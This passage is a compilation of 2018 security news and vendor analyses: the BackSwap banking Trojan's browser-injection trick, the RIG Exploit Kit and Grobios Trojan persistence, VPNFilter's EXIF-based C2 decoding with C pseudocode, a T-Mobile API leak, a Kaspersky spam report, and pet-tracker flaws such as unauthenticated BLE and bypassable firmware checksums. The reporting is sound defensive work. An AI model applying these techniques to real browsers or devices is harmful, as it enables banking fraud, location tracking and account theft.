“In older samples, the malware inserts the malicious script into the clipboard and simulates pressing the key combination for opening the developer’s console (CTRL+SHIFT+J in Google Chrome, CTRL+SHIFT+K in Mozilla Firefox) followed by CTRL+V, which pastes the content of the clipboard and then sends ENTER to execute the contents of the console. Finally, the malware sends the console key combination again to close the console. The browser window is also made invisible during this process – to regular users it might seem as if their browser simply froze for a moment.” reads the analysis published by ESET.

“In the newer variants of the malware, this approach has been upgraded – instead of interacting with the developer’s console, the malicious script is executed directly from the address bar, via JavaScript protocol URLs; a little-used feature supported by most browsers. The malware simply simulates pressing CTRL+L to select the address bar followed by the DELETE key to clear the field, then “types” in “javascript:” by calling SendMessageA in a loop, and then pastes the malicious script with the CTRL+V combination. It then executes the script by sending the ENTER key. At the end of the process, the address bar is cleared to remove any signs of compromise.”

Current versions of the BackSwap Trojan could be used against most popular browsers such as Google Chrome, Mozilla Firefox and Internet Explorer.

The experts believe that many other malware will adopt the same technique in a short time, it is easy to implement and very effective.

ESET confirmed that current versions of the BackSwap Trojan include the scripts to interact with five Polish banks, PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING, and Pekao.

BackSwap Trojan

“Nonetheless, ESET said it notified browser vendors about BackSwap’s new techniques in the hopes they’d deploy countermeasures in upcoming browser versions, and mitigate these types of attacks before they go mainstream with other malware families.” concluded ESET.


Experts noticed an ongoing activity involving the RIG Exploit Kit to deliver the Grobios Trojan
28.5.2018 securityaffairs 
Exploit

Malware researchers from FireEye recently noticed an interesting ongoing activity involving the infamous RIG Exploit Kit (EK) to deliver the Grobios Trojan.
Security experts highlighted several times the decline of the exploit kit activity after the disappearance of the Angler and Nuclear exploit kits in 2016.
Anyway, researchers at FireEye periodically observe significant developments in this space and recently noticed an interesting ongoing activity involving the infamous RIG Exploit Kit (EK).

The RIG Exploit Kit has been recently involved in the distribution of the Grobios Trojan, in the following image is reported the infection chain.

RIG Exploit Kit Grobios campaign

“We first observed redirects to RIG EK on Mar. 10, 2018, from the compromised domain, latorre[.]com[.]au, which had a malicious iframe injected to it.” reads the analysis published by FireEye.

“The iframe loads a malvertisement domain, which communicates over SSL and leads to the RIG EK landing page that loads the malicious Flash file”. “When opened, the Flash file drops the Grobios Trojan.”

Malware researchers said the Grobios Trojan implements several evasion techniques and uses various persistence mechanisms to make hard for victims to uninstall the threat. The malware implements the following techniques to gain persistence:

It delivers a copy of itself into the %APPDATA% folder (i.e. %APPDATA%\Google\v2.1.13554\<RandomName>.exe.), masquerading as a version of legitimate application installed on the target system. It creates an Autorun registry key and a shortcut in the Windows Startup folder.
It drops multiple copies of itself in subfolders of a program at the path %ProgramFiles%/%PROGRAMFILES(X86)%, masquerading as a different version of the installed program, and sets an Autorun registry key or creates a scheduled task.
It drops a copy itself in the %Temp% folder, and creates a scheduled task to run it.
The malware also uses multiple anti-debugging, anti-analysis and anti-VM techniques to evade the detection.

Once completed a series of checks to detect the VM and malware analysis environment, the Grobios Trojan connects to the command and control (C2) server to receive commands.

“In an effort to evade static detection, the authors have packed the sample with PECompact 2.xx.” continues the analysis.

“The unpacked sample has no function entries in the import table. It uses API hashing to obfuscate the names of API functions it calls and parses the PE header of the DLL files to match the name of a function to its hash. The malware also uses stack strings.”

Once infected the system, the malware also creates two scheduled tasks.

Experts highlighted that the malware protects its copy in the %TEMP% folder with (Windows Encrypted File System) EFS.

The analysis of the code also revealed the presence of two hardcoded obfuscated C2s.

“Despite the decline in activity, exploit kits still continue to put users at risk – especially those running older versions of software. Enterprises need to make sure their network nodes are fully patched.” concluded FireEye.

Further details including the IoCs for the threat are available in the report.


VPNFilter EXIF to C2 mechanism analysed
27.5.2018 Kaspersky
Virus

On May 23 2018, our colleagues from Cisco Talos published their excellent analysis of VPNFilter, an IoT / router malware which exhibits some worrying characteristics.

Some of the things which stand out about VPNFilter are:

It has a redundant, multi-stage command and control mechanism which uses three different channels to receive information
It has a multi-stage architecture, in which some of the more complex functionality runs only in the memory of the infected devices
It contains a destructive payload which is capable of rendering the infected devices unbootable
It uses a broken (or incorrect) RC4 implementation which has been observed before with the BlackEnergy malware
Stage 2 command and control can be executed over TOR, meaning it will be hard to notice for someone checking the network traffic
We’ve decided to look a bit into the C&C mechanism for the persistent malware payload. As described in the Talos blog, this mechanism has several stages:

First, the malware tries to visit a number of gallery pages hosted on photobucket[.]com and fetches the first image from the page.
If this fails, the malware tries fetching an image file from a hardcoded domain, toknowall[.]com. This C2 domain is currently sinkholed by the FBI.
If that fails as well, the malware goes into a passive backdoor mode, in which it processes network traffic on the infected device waiting for the attacker’s commands.
For the first two scenarios in which the malware successfully receives an image file, a C2 extraction subroutine is called which converts the image EXIF coordinates into an IPv4 address. This is used as an easy way to avoid using DNS lookups to reach the C&C. Of course, in case this fails, the malware will indeed lookup the hardcoded domain (toknownall[.]com). It may be worth pointing that in the past, the BlackEnergy APT devs have shown a preference for using IP addresses for C&C instead of hardcoded domain names, which can be easily sinkholed.

To analyse the EXIF processing mechanism, we looked into the sample 5f358afee76f2a74b1a3443c6012b27b, mentioned in the Talos blog. The sample is an i386 ELF binary and is about 280KB in size.

Unfortunately for researchers, it appears that the photobucket.com galleries used by the malware have been deleted, so the malware cannot use the first C2 mechanism anymore. For instance:

With these galleries unavailable, the malware tries to reach the hardcoded domain toknowall[.]com.
While looking at the pDNS history for this domain, we noticed that it resolved to an IP addresses in France, at OVH, between Jan and Feb 2018:

Interestingly, when visiting this website’s C2 URL, we are presented with a JPG image, suggesting it is still an active C2:

Here’s how it looks when viewed as an image:

When we look into the EXIF data for the picture, for instance using IrfanView, it looks as following:

Filename – update.jpg

GPS information: –
GPSLatitude – 97 30 -175 (97.451389)
GPSLongitude – -118 140 -22 (-115.672778)
How to get the IP out of these? The subroutine which calculates the C2 IP from the Latitude and Longitude can be found at offset 0x08049160 in the sample.

As it turns out, VPNFilter implements an actual EXIF parser to get the required information.

First, it searches for a binary value 0xE1. This makes sense because the EXIF attribute information begins with a tag “0xFF 0xE1”. Then, it verifies that the tag is followed by a string “Exif”. This is the exact data that should appear in a correct header of the Exif tag:

Exif tag
FF E1 Exif tag
xx Length of field
45 78 69 66 00 ‘Exif’
00 Padding

The tag is followed by an additional header:

“Attribute information” header
49 49 (or 4D 4D) Byte order, ‘II’ for little endian (‘MM’ for big endian)
2A 00 Fixed value
xx xx Offset of the first IFD

The data following this header is supposed to be the actual “attribute information” that is organized in so-called IFDs (Image File Directory) that are data records of a specific format. Each IFD consists of the following data:

IFD record
xx xx IFD tag
xx xx Data type
xx xx xx xx Number of data records of the same data type
xx xx xx xx Offset of the actual data, from the beginning of the EXIF

The malware’s parser carefully traverses each record until it finds the one with a tag ’25 88′ (0x8825 little endian). This is the tag value for “GPS Info”. That IFD record is, in turn, a list of tagged IFD records that hold separate values for latitude, longitude, timestamp, speed, etc. In our case, the code is looking for the tags ‘2’ (latitude) and ‘4’ (longitude). The data for latitude and longitude are stored as three values in the “rational” format : two 32-bit values, the first is the enumerator and the second one is the denominator. Each of these three values corresponds to degrees, minutes and seconds, respectively.

Then, for each record of interest, the code extracts the enumerator part and produces a string of three integers (i.e. “97 30 4294967121” and “4294967178 140 4294967274″ that will be displayed by a typical EXIF parser as 1193143 deg 55′ 21.00″, 4296160226 deg 47′ 54.00”). Then, curiously enough, it uses sscanf() to convert these strings back to integers. This may indicate that the GPS Info parser was taken from a third-party source file and used as-is. The extracted integers are then used to produce an actual IP address. The pseudocode in C is as follows:

const char lat[] = "97 30 4294967121"; // from Exif data
const char lon[] = "4294967178 140 4294967274"; // from Exif data
int o1p1, o1p2, o2p1, o3p1, o3p2, o4p1;
uint8_t octets[4];

sscanf(lat, "%d %d %d", &o1p2, &o1p1, &o2p1);
sscanf(lon, "%d %d %d", &o3p2, &o3p1, &o4p1);
octets[0] = o1p1 + ( o1p2 + 0x5A );
octets[1] = o2p1 + ( o1p2 + 0x5A );
octets[2] = o3p1 + ( o3p2 + 0xB4 );
octets[3] = o4p1 + ( o3p2 + 0xB4 );

printf("%u.%u.%u.%u\n", octets[0], octets[1], octets[2], octets[3]);

The implementation of the EXIF parser appears to be pretty generic. The fact that it correctly handles the byte order (swapping the data, if required) and traverses all EXIF records skipping them correctly, and that the GPS data is converted to a string and then back to integers most likely indicates that the code was reused from an EXIF-parsing library or toolkit.

For the values provided here, the code will produce the IP address “217.12.202.40” that is a known C&C of VPNFilter.

It should be noted that this IP is included in Cisco Talos’ IOCs list as a known C&C. Currently, it appears to be down.

What’s next?
Perhaps the most interesting question is who is behind VPNFilter. In their Affidavit for sinkholing the malware C2, FBI suggests it is related to Sofacy:

Interestingly, the same Affidavit contains the following phrase: “Sofacy Group, also known as apt28, sandworm, x-agent, pawn storm, fancy bear and sednit”. This would suggest that Sandworm, also known as BlackEnergy APT, is regarded as subgroup of Sofacy by the FBI. Most threat intel companies have held these groups separate before, although their activity is known to have overlapped in several cases.

Perhaps the most interesting technical detail, which Cisco Talos points in their blog linking VPNFilter to BlackEnergy, is the usage of a flawed RC4 algorithm.The RC4 key scheduling algorithm implementation from these is missing the typical “swap” at the end of the loop. While rare, this mistake or perhaps optimization from BlackEnergy, has been spotted by researchers and described publicly going as far back as 2010. For instance, Joe Stewart’s excellent analysis of Blackenergy2 explains this peculiarity.

So, is VPNFilter related to BlackEnergy? If we are to consider only the RC4 key scheduling implementation alone, we can say there is only a low confidence link. However, it should be noted that BlackEnergy is known to have deployed router malware going back as far as 2014, which we described in our blogpost: “BE2 custom plugins, router abuse, and target profiles“. We continue to look for other similarities which could support this theory.


A bug in T-Mobile site allowed anyone see any customer’s account details
27.5.2018  securityaffairs  Incindent  Hacking

A flaw in T-Mobile’s website allowed anyone to access the personal account details of any customer by providing their mobile number.
The bug discovered by the researcher Ryan Stevenson resides in the T-Mobile subdomain promotool.t-mobile.com used by the staff as a customer care portal to access the company’s internal tools.

The promotool.t-mobile.com subdomain contained a hidden API that would return customer data simply by invoking it with the customer’s cell phone number as a parameter.

The data leak was caused by the lack of any authentication mechanism for calling the API, in this way anyone could have had access to any customer record including full name, postal address, billing account number, and in some cases information about tax identification numbers.

The exposed records also included references to account PINs used by customers as a security question when they contact the customer case, this means that an attacker could use that information to impersonate a customer and take over its account.

“Although the API is understood to be used by T-Mobile staff to look up account details, it wasn’t protected with a password and could be easily used by anyone.” reported ZDnet.

“The returned data included a customer’s full name, postal address, billing account number, and in some cases information about tax identification numbers. The data also included customers’ account information, such as if a bill is past-due or if the customer had their service suspended.”

t-mobile-data leak

Searching for the portal on the Wayback Machine we can verify that the subdomain is online at least since October.

Stevenson reported the flaw to the telco giant in early April, the company quickly disabled the API and awarded the researcher of $1,000 under its bug bounty program.

“The bug bounty program exists so that researchers can alert us to vulnerabilities, which is what happened here, and we support this type of responsible and coordinated disclosure.” said T-Mobile spokesperson.

“The bug was patched as soon as possible and we have no evidence that any customer information was accessed,” the spokesperson added.

This isn’t the first time that T-Mobile discovered such kind of issues, in October Motherboard reported another API accessible from a different T-Mobile subdomain.

In February, Motherboard journalist Lorenzo Franceschi-Bicchierai published an interesting post on SIM hijacking reporting that T-Mobile customers were victims of an info disclosure exploit.


Coca-Cola data breach has affected about 8,000 workers
27.5.2018  securityaffairs Incindent

Coca-Cola discovered a security breach in September when law enforcement officials notified it that a former employee at a Coca-Cola subsidiary was found in possession of an external hard drive containing worker data.
Coca-Cola announced a data breach after a former employee was found in possession of worker data on a personal hard drive. In compliance with state laws, the company is notifying the data breach to the affected employees via letter.

The company discovered the security breach in September when law enforcement officials notified it that a former employee at a Coca-Cola subsidiary was found in possession of an external hard drive.

Coca-Cola supported the investigation conducted by law enforcement, it confirmed the authenticity of the documents that contained personal information of some workers.

The company did not disclose the incident immediately at the request of authorities who were investigating the data breach.

Following state laws, the company is now sending notification letters to affected employees.

According to a company spokesman, the data breach has affected about 8,000 workers.

“We are issuing data breach notices to about 8,000 individuals whose personal information was included in computer files that a former employee took with him when he left the company,” a company spokesperson told Bleeping Computer.

“We take information security very seriously, and we sympathize with everyone whose information may have been exposed. We regret any inconvenience or concern this may be causing them. We do not have any information to suggest that the information was used to commit identity theft.”

As usually happens in these cases, Coca-Cola is offering free identity monitoring for one year to affected employees.

Back in 2014, Coca-Cola warned some 74,000 employees and other individuals that their personal information was compromised due to the theft of several company laptops.


Spam and phishing in Q1 2018
27.5.2018  Kaspersky  Analysis
Phishing 

Quarterly highlights
Data leaks
Early 2018 will be remembered for a series of data leak scandals. The most high-profile saw Facebook CEO Mark Zuckerberg grilled by US Congress, with many public figures supporting the Delete Facebook campaign. As a result, Zuckerberg promised to get tough and make it more difficult to harvest data from third-party apps.

But the buck doesn’t stop entirely with the tech giants—personal data often ends up in cybercriminal hands due to user carelessness. Some techniques may be timeworn, but one in particular still reels in the victims: Facebook users are one of the juiciest targets for cyberfraudsters looking to launch mass phishing attacks. Last year Facebook was one of the Top 3 most exploited company names. The schemes are numerous, but fairly standard: the user is asked to “verify” an account or lured into signing into a phishing site on the promise of interesting content.

Examples of phishing pages mimicking Facebook login

Fake pages such as these exist in all languages ​​supported by the social media. Sometimes the correct localization is selected automatically based on the victim’s IP address.

Example of code used by cybercriminals to determine the victim’s location and adapt the phishing page

Data often falls into the hands of cybercriminals through third-party apps that users themselves give access to their accounts and sometimes even allow to post messages on their own behalf.

In early March, for instance, several hundred VKontakte users were hit when third parties gained access to their private correspondence. This happened as a result of apps using the social network’s open API to request access to personal data without guaranteeing its safe storage and use.

In the headline-grabbing case of Cambridge Analytica’s This Is Your Digital Life app, users also handed over personal information voluntarily. Carelessness is the culprit: many people are unaware of just how much data they give away in personality quizzes.

Social media quizzes often ask for a lot of user data,

Remember that cybercriminals often use social media to spread malicious content. For example, we wrote about fake airline giveaways, adult video spam, and even an Alberto Suárez phishing petition.

Another major personal data story was the appearance in Russia of the GetContact app for smartphones, which not only tells users who’s calling, but shows the names under which their contacts are saved in other app users’ phone books. For this, the program needs to be fed not just the user’s own data, but the entire address book (photos, email addresses, even conversation history). That earned GetContact a ban in several countries (even before it appeared in Russia).

Telegram, ICOs, cryptocurrencies
In Q1 a battle royale broke out over the Telegram messenger. It all began late last year with talk of an upcoming ICO. That provided the backdrop for cybercriminals to create, which by the end of Q1 had allegedly raked in as much as the company’s rumored private ICO.

Fake site offering the chance to participate in the Telegram ICO

That was followed by a wave of phishing mailshots to owners of major Russian channels in Telegram. An account under the name Telegram (or something similar) sent a message informing potential victims that suspicious activity had been detected on their account and that confirmation was required to avoid having it blocked. A link was provided to a phishing site masquerading as the login page for the web version of Telegram.

Phishing site mimicking the web version of the Telegram app

If the victim agreed to fill out the form, the cybercriminals gained access to their account, plus the ability to link it to another phone number.

Another spike in scamming activity was recorded when the Internet was buzzing about the imminent takedown of the messenger in Russia. And when the messenger suffered a power outage in a server cluster, it was widely perceived as the start of the ban. Replying to Pavel Durov’s tweet about the malfunction, enterprising cybercriminals offered compensation on his behalf in cryptocurrency. To claim it, users had to follow a link to a site where they were asked to transfer a sum of money to a specified wallet number to receive their “compensation.”

But Telegram does not have a monopoly over the cryptocurrency topic this quarter. We repeatedly encountered phishing sites and email messages exploiting the launch of new ICOs. Cryptocurrency scams often bring in millions of dollars, which explains why cybercriminals are so fond of them.

For instance, on January 31–February 2 the Bee Token startup held an ICO for which participants had to register in advance on the project website, specifying their email address. Cybercriminals managed to get hold of a list of email addresses of potential investors and send out a timely invitation containing e-wallet details for making Ethereum-based investments.

Phishing email supposedly sent from the ICO organizers

123,3275 ether were transferred to this wallet (around $84,162.37). Fraudsters also set up several phishing sites under the guise of the platform’s official site.

A similar scam occurred with the Buzzcoin ICO. The project website invited users to subscribe to a newsletter by leaving an email address. The day before the official ICO start, subscribers received a fraudulent message about the start of pre-sales with a list of cryptowallets to which money should be transferred.

Phishing email supposedly sent from the ICO organizers

Cybercriminals scooped about $15,000 before the organizers took action.

GDPR
One measure that addresses user safety is the General Data Protection Regulation (GDPR), a general policy on the protection and privacy of individuals. This EU regulation has a direct bearing on all companies that process data belonging to EU residents, and therefore has an international scope. The GDPR becomes enforceable on May 25 this year and stipulates large fines (up to EUR 20 million or 4% of annual revenue) for companies whose information activity does not comply with the regulation.

Such a landmark event in the IT world could hardly fail to attract cybercriminals, and in recent months (since the end of last year) we have registered a large number of spam emails related one way or another to the GDPR. It is generally B2B spam—mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.

We also came across spam offers to install on the target company’s main website or landing page special fee-based software providing web resources with everything necessary to comply with the new rules. Moreover, the site owner would supposedly be insured against problems relating to user data security.

Spam traffic also contained offers to acquire ready-made specialized databases of individuals and legal entities broken down by business division or other criteria. The sellers had no scruples about stressing that all addresses and contacts for sale were already GDPR-compliant. In fact, harvesting user data and reselling it to third parties without the consent of the owners and data carriers violates not only this regulation, but also the law in general.

Example of a spam message exploiting the GDRP topic

Note that legitimate mailers also became more active. They are already sending notices to users describing the new rules and asking for consent to use and process their data under the new policy. When the new regulation enters into force, the number of such notices will skyrocket, so we predict a surge in scam mailings aimed at obtaining personal info and authentication data for access to various accounts. We urge users to pay close attention to the new regulation and carefully study any notifications related to it. Links should be checked before clicking: they should not contain redirects to third-party sites or domains unrelated to the service on whose behalf the message was sent.

Political spam
In the runup to the Russian presidential elections, we observed a range of political spam, including messages promoting or slurring various candidates. The election topic was used for fraud: cybercriminals sent email messages offering a financial reward for taking part in public opinion polls, as a result of which money ended up being transferred in the opposite direction.

Example of a message inviting recipients to take part in a poll

Phishing for taxpayers
Every country has its own tax year, but as a rule the most active period for dealing with tax services comes at the start of the year. In Q1 we registered many phishing pages mimicking the IRS, HMRC, and other countries’ tax services.

Fake tax service websites

Spam-based malware
Back in Q1 2017 we wrote about a mailout disguised as a resume concealing a malicious file from the Fareit Trojan spyware family. The same quarter 2018, cybercriminals attempted to infect users’ computers with the Smoke Loader backdoor, also known as Dofoil. Its toolbox includes downloading and installing malware such as cryptocurrency miners, banking Trojans, and ransomware. Smoke Loader could also disable some antivirus software and hide from detection by integrating itself into system processes.

The text of the malicious mailshot varied, with some messages imitating the business correspondence of real company employees. To open the password-protected DOC attachment, the user had to enter the password specified in the message, which triggered a request to enable macros (disabled by default); confirmation proved fatal for message recipients. We observed a trend for password-protected malicious attachments in Q1 2018: such protection hinders detection and increases the chances that the message will reach the recipient.

Examples of emails with malicious attachments

Another long-established social engineering method exploits user fears of infection, data leakage, access denial, and other bugbears. In Q1, this old trick was used to dupe users into parting with cryptocurrency. Most messages tried to scare recipients by reporting that malware was installed on their computer and that personal info (lists of contacts, monitor screenshots, webcam videos, etc.) was compromised. If the scammers didn’t receive a hush payment, it was said, the harvested information would be sent to all the victim’s contacts.

Example of a message with a ransom demand in exchange for not publicizing the victim’s personal data

Some messages from cybercriminals tried not only to extract money, but to install malware on recipients’ computers. The malware was located in a protected archive attachment that the attackers claimed was proof that they had the victim’s data.

Malware under the guise of proving cybercriminal intent

Statistics: spam
Proportion of spam in email traffic

Proportion of spam in global email traffic, Q4 2017 and Q1 2018

In Q1 2018, the largest share of spam was recorded in January (54.50%). The average share of spam in global email traffic was 51.82%, down 4.63 p.p. against the figure for Q4 2017

Sources of spam by country


Sources of spam by country, Q1 2018

Q1 2018 results put Vietnam (9.22%) top of the leaderboard of spam sources by country. In second place, just 0.64 p.p. behind, came the US (8.55%). The rating’s frequent leader China (7.87%) slipped to third, while India (7.10%) and Germany (6.35%) claimed fourth and fifth. The Top 10 is rounded off by Iran (2.51%).

Spam email size

Spam email size, Q4 2017 and Q1 2018

In Q1 2018, the share of very small emails (up to 2 KB) in spam increased by 19.79 p.p. to 81.62%. Meanwhile,the proportion of emails between 5 and 10 KB in size fell (by 6.05 p.p.) against the previous quarter to 4.11%.

The number of emails between 10 and 20 KB also decreased (by 4.91 p.p.). Likewise, there were fewer emails sized 20 to 50 KB—this quarter they made up just 2.72% of the total, which represents a drop of 6.81 p.p. compared to the previous reporting period.

Malicious attachments in email
Top 10 malware families


Top 10 malware families, Q1 2018

The most widespread malware family in email traffic this quarter was Trojan-PSW.Win32.Fareit (7.01%), with Backdoor.Java.QRat (6.71%) and Worm.Win32.WBVB (5.75%) completing the Top 3. Fourth place went to Backdoor.Win32.Androm (4.41%), and Trojan.PDF.Badur (3.56%) rounds off the Top 5.

Countries targeted by malicious mailshots

Distribution of Mail Anti-Virus triggers by country, Q1 2018

Germany (14.67%) was this quarter’s leader by number of Mail Anti-Virus triggers, followed by Russia on 6.37% and Britain with a score of 5.43%. Fourth and fifth positions were occupied by Italy (5.40%) and the UAE (4.30%).

Statistics: phishing
In Q1 2018, the Anti-Phishing module prevented 90,245,060 attempts to direct users to scam websites. The share of unique users attacked made up 9.6% of all users of Kaspersky Lab products worldwide.

Geography of attacks
The country with the largest percentage of users affected by phishing attacks in Q1 2018 was Brazil (19.07%, -1.72 p.p.).

Geography of phishing attacks*, Q1 2018

* Number of users on whose computers Anti-Phishing was triggered as a percentage of the total number of Kaspersky Lab users in that country

Second came Argentina (13.30%), and third place was taken by Venezuela (12.90%). Fourth and fifth went to Albania (12.56%) and Bolivia (12.32%).

Country %
Brazil 19.07
Argentina 13.30
Venezuela 12.90
Albania 12.56
Bolivia 12.32
Réunion 11.88
Belarus 11.62
Georgia 11.56
France 11.40
Portugal 11.26
Top 10 countries by percentage of users attacked by phishers

Organizations under attack
Rating of categories of organizations attacked by phishers
The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab’s heuristic Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat.

In Q1 2018, the Global Internet Portals category again took first place with 23.7% (-2.56 p.p.).

Distribution of organizations affected by phishing attacks by category, Q1 2018

However, the combined financial category—banks (18.25%), online stores (17.26%), payment systems (8.41%)—still accounted for almost half of all attacks (43.92%), which is up 4.46 p.p. against the previous quarter . The next categories in descending order were Government Organizations (4.75%), Social Networks and Blogs (4.11%), Telecommunications Companies (2.47%), IT Companies (1.55%), Messengers (0.66%), Online Games (0.43%), and Airlines (0.07%).

Conclusion
The quarter’s main topic, one that we will likely return to many times this year, is personal data. It remains one of the most sought-after wares in the world of information technology for app and service developers, owners of various agencies, and, of course, cybercriminals. Unfortunately, many users still fail to grasp the need to protect their personal information and don’t pay attention to who and how their data is transferred in social media.

Cybercriminal interest in personal data is confirmed by our analysis of spam traffic, where one of the main topics remains mail phishing employing a range of social and technical engineering methods. Throughout the quarter, we observed fake notifications on behalf of social media and popular services, bank phishing, and “Nigerian prince” emails.

The GDPR, set to come on stream in late May, is intended to correct the situation regarding personal data, at least in the EU . Time will tell how effective it is. But one thing is clear: even before its introduction, the new regulation is being actively exploited as a topic by cybercriminals and many others. Regrettably, the GDPR is unlikely to fix the situation.

In Q1 2018, the average share of spam in global email traffic was 51.82%, down 4.63 p.p. against Q4 2017; the Anti-Phishing module blocked 90,245,060 attempts to direct users to fraudulent pages; and Brazil (19.07%, -1.72 p.p.) had the largest share of users attacked by phishers.

Based on the quarter results, it is safe to predict that scammers will continue to exploit “fashionable” topics, two of which are cryptocurrencies and new ICOs. Given that these topics have begun to attract interest from the general public, a successful attack can reap vast rewards.


I know where your pet is
26.5.2018 Kaspersky
Vulnerebility
Kaspersky Lab’s many years of cyberthreat research would suggest that any device with access to the Internet will inevitably be hacked. In recent years, we have seen hacked toys, kettles, cameras, and irons. It would seem that no gadget has escaped the attention of hackers, yet there is one last bastion: “smart” devices for animals. For example, trackers to monitor their location. Such gadgets can have access to the owner’s home network and phone, and their pet’s location.

This report highlights the potential risks for users and manufacturers. In it, we examine several trackers for potential vulnerabilities. For the study, we chose some popular models that have received positive reviews:

Kippy Vita
LINK AKC Smart Dog Collar
Nuzzle Pet Activity and GPS Tracker
TrackR bravo and pixel
Tractive GPS Pet Tracker
Weenect WE301
Whistle 3 GPS Pet Tracker & Activity Monitor
Technologies used: Bluetooth LE
The four trackers in the study use Bluetooth Low Energy (BLE), which in many cases is the weak spot in the device’s protective armor. Let’s take a closer look at this technology. BLE is an energy-saving Bluetooth specification widely used in IoT devices. What we’re interested in is the lack of authentication and the availability of services and characteristics.

Unlike “classic” Bluetooth, where peer devices are connected using a PIN code, BLE is aimed at non-peer devices, one of which may not have a screen or keyboard. Thus, PIN code protection is not implemented in BLE — authentication depends entirely on the developers of the device, and experience shows that it is often neglected.

The second feature of interest to us is the availability of services, characteristics, and descriptors. They form the basis for data transfer between devices in the BLE specification. As we already noted, BLE works with non-peer devices, one of which (the one that does the connecting) is usually a smartphone. The other device, in our case, is a tracker. After connecting to it, several BLE services are available to the smartphone. Each of them contains characteristics which in turn may have descriptors. Both characteristics and descriptors can be used for data transfer.

Hence, the correct approach to device security in the case of BLE involves pre-authentication before characteristics and descriptors are made available for reading and writing. Moreover, it is good practice to break the link shortly after connecting if the pre-authentication stage is not passed. In this case, authentication should be based on something secret that is not accessible to the attacker—for example, the first part of the data can be encrypted with a specific key on the server (rather than the app) side. Or transmitted data and the MAC address of the connected device can be confirmed via additional communication channels, for example, a built-in SIM card.

Kippy Vita
This tracker transfers GPS coordinates to the server via its built-in SIM card, and the pet’s location is displayed in the mobile app. The tracker does not interface “directly” with the smartphone. We could not detect any problems in the device itself, so we turned our focus to the mobile apps.

Here, too, everything looked pretty good: SSL Pinning was implemented, unlike in any other app we tested. Moreover, the Android app encrypts important data before saving it to its own folder.

The only problem we did detect was that the app for Android logs data that is transmitted to the server. This data can include the user’s password and login, as well as an authentication token.


Output of the Kippy Vita app with user login and password

Despite the fact that not all apps can read logs (only system apps or ones with superuser rights), it is still a major security issue.

Registered CVE:
CVE-2018-9916

Link AKC
This tracker monitors the pet’s location via GPS and transfers coordinates via the built-in SIM card. What’s more, it can interface with the owner’s phone directly — via Bluetooth LE. And this means that it is always ready to connect devices, which makes a good starting point for the study.

We were pleasantly surprised by Link AKC: the developers did everything right in terms of securing the connection to the smartphone. We couldn’t find any major problems, which is rare for devices with BLE support.

After the smartphone connects to the device and discovers services, it should enable notifications (that is, inform the tracker of expected changes) in two characteristics and a descriptor (otherwise the tracker breaks the link). After that Link AKC is ready to receive commands. They should contain the user ID; if the user does not have rights to use the tracker, the command is not executed. This maintains control over access rights. Even using the ID obtained from the tested device, we could not make the gadget execute a command from another smartphone—it appears that the tracker checks the smartphone’s MAC address.

However, the device cannot be described as completely secure. In the app for Android, we found that the developers had forgotten to disable logging. As a result, the app transfers lots of data to logcat, including:

the app’s authorization token, which if intercepted can be used to sign into the service and discover the pet’s location:

User registration data, including name and email address:

Device coordinates:

Starting with Android 4.1, only some system apps or apps with superuser rights can read the logs of other programs. It is also possible to gain access when connecting the smartphone to a computer, but this requires Android developer mode to be activated.

Despite these restrictions, it is still a problem: attackers can get hold of data to access the victim’s account, even if the likelihood of this happening is small.

On top of that, the Android app does not verify the server’s HTTPS certificate, exposing it to man-in-the-middle (MITM) attacks. For a successful attack, attackers need only install their own certificate on the smartphone (which is quite simple to do), allowing them to intercept all transmitted data, including passwords and tokens used for account access:


The Link AKC app for Android is vulnerable to MITM attacks

The authorization token is also stored in unencrypted form in the app folder. Although superuser rights are needed to access it, it is still not the best place to store important data.

The authorization token is stored in unencrypted form

Registered CVE:
CVE-2018-7041

Nuzzle
In terms of functionality, Nuzzle is like the previous tracker: It too uses a SIM card to transmit the pet’s GPS coordinates and can directly connect to a smartphone via BLE. But on the latter point, Nuzzle performed less well than Link AKC: the lack of authorization and access control means that the device is ready to interface with any smartphone. This lets an attacker take control of the device, just like the owner. For example, it can quickly discharge the battery by turning on the light bulb (for which the value of just one attribute needs changing).

An attacker can receive data from the device as soon as a connection is made. Data is available in two characteristics: one contains telemetry information, including device location, while the other provides device status information (in particular, temperature and battery charge).

What is worse, the continuous reading of data from the telemetry characteristic results in the device being “lost”: to save battery power, the gadget does not transmit coordinates via the mobile network if they have already been sent via BLE. Thus, it is possible to conceal the location of the pet simply by connecting to the tracker using a smartphone.

We detected another security hole in the process of updating the device firmware. The integrity control was found to be easy to bypass. Basically, the firmware consists of two files with the extensions DAT and BIN. The first contains information about the firmware, including the checksum (CRC16) used in the integrity control, and the second contains the firmware itself. All it takes to install modified software on the tracker is to change the checksum in the DAT file.

AT commands in Nuzzle firmware

To cripple the device, we didn’t even need to analyze the firmware: it is not encrypted or packed, so just by opening it in a hex editor we were able to find the AT commands and the host used to send data by means of the SIM card. After we changed several bytes in the host, updated the firmware checksum, and uploaded it to the device, the tracker stopped working.

As in the case of Link AKC, the Nuzzle app for Android does not check the server certificate, and the authentication token and user email address are stored in the app folder in unencrypted form.


Unencrypted authorization token and user email address

Registered CVE:
CVE-2018-7043
CVE-2018-7042
CVE-2018-7045
CVE-2018-7044

TrackR
Two TrackR devices featured in our study: Bravo and Pixel. These “trinkets” differ from previous devices in that their tracking range (if indeed they are intended to track pets) is limited to 100 meters: unlike other models, they have no GPS module or SIM card, and the only link to them is via Bluetooth LE. Their main purpose is to locate keys, remote controls, etc. around the apartment. However, the developers have equipped the devices with an option that lets them partially track the movements of something: the trackers location can be transmitted “via” the smartphones of other TrackR app users. If the app is running on the smartphone, it will transfer data to the service about all “trinkets” detected nearby, together with the smartphone coordinates. Therein lies the first defect: anyone can sign into the mobile app and send fake coordinates.

We managed to identify a few more problems, but as it turned out, most of them had already been discovered by our colleagues at Rapid7. Although their research was published more than a year ago, some vulnerabilities had yet to be fixed at the time of penning this article.

For instance, the devices have no authentication when connecting via Bluetooth LE, which means they are open to intruders. An attacker could easily connect and turn on the audio signal, for example, simply by changing the value of one characteristics. This could let an attacker find the animal before its owner does or run down the tracker battery.

Structure of TrackR services and attributes

Besides, the app for Android does not verify server certificates, meaning that an MITM attack could lead to the interception of the password, authentication token, user email address, and device coordinates.

TrackR Android app requests contain an authentication token

